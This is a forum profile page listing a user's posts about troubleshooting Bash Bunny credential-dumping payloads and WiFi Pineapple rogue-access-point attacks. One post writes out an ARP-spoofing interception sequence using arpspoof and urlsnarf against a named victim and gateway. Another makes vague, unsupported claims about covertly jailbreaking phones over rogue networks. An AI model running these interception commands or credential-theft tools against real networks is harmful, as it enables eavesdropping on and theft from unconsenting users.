Jump to content

TwistedPacket

Active Members
  • Posts

    63
  • Joined

  • Last visited

Recent Profile Visitors

786 profile views

TwistedPacket's Achievements

Newbie

Newbie (1/14)

  1. Hello, I am on the latest fw and have a odd issue. When I plug in the BB it turns green for a few seconds like its booting then does nothing at all if I have the switch selected for DumpCreds. I would think that the led light would come on but it never does? I have tested a lot of other payloads and never have seen this happen. Does anyone have any ideas? Thanks!
  2. Hello Everyone, I am having an issue with my quickcreds setup that perhaps someone can help me figure out. I have it installed and working just fine using switch 2. However it will only work if I disable or unplug the network card from the workstation? Also if the workstation happens to have a wireless network card it must be disabled as well or the attack will not work. Once I do that everything works as it should. I have tried this on windows 7 and windows 10. Five workstations and 3 laptops that all do the same thing. Any ideas? Thank you!
  3. I just flashed my Pineapple to 2.8.1 good news Karma works! Bad news is that if I plug in anything into the usb port my Pineapple reboots within 2 minutes It also will not start with anything in the usb port. Any help would be great! -Tp
  4. What IP address do you have on your computers nic? You need to make sure its 172.16.42.42 And plugged into the LAN port not the POE port on the pineapple. -Tp
  5. Try to blacklist just one AP as a test. Also use a powered Hub on Wlan1 that fixed my issue with Wlan0 shutting down -Tp
  6. The exploit occurred when the phone was plugged in to charge. The way I understand it is that the IOS code that this is using has to do with verifying AC power. Not sure how it works to be honest :) -Tp
  7. I think its going to be relased at Blackhat this year. . -Tp
  8. If your phone connect's to the rouge network.the hacker can scan your phone.. Sniff traffic etc. There is a way to even Jailbrake iPhone's secretly when connected to a rouge AP and install hidden apps. On Android you just spoof an update then PWNED! -Tp
  9. The pineapple cant handle the load is what I think. I can run my pineapple all week in AP mode running karma but as soon as I turn on any thing else it reboots sometimes in a few hours sometimes in a few minutes. -Tp
  10. echo '1' > /proc/sys/net/ipv4/ip_forward arpspoof -i wlan0 -t 192.168.1.45 192.168.1.1 & > /dev/null arpspoof -i wlan0 -t 192.168.1.1 192.168.1.45 & > /dev/null urlsnarf -i wlan0 Most new wireless routers have some type of AntiArpSpoofing protection so it might not work at all. I am seeing every network I work on now have this all ready enabled so Arp spoofing is becoming a thing of the past. -Tp
  11. You need to set the interface to use an open ipaddress of your network. And then configure the routing. You can then set up ip forwarding to pass trafic with the wireless interface Wlan 0. -Tp
  12. Can you re flash to see if that helps? -Tp
×
×
  • Create New...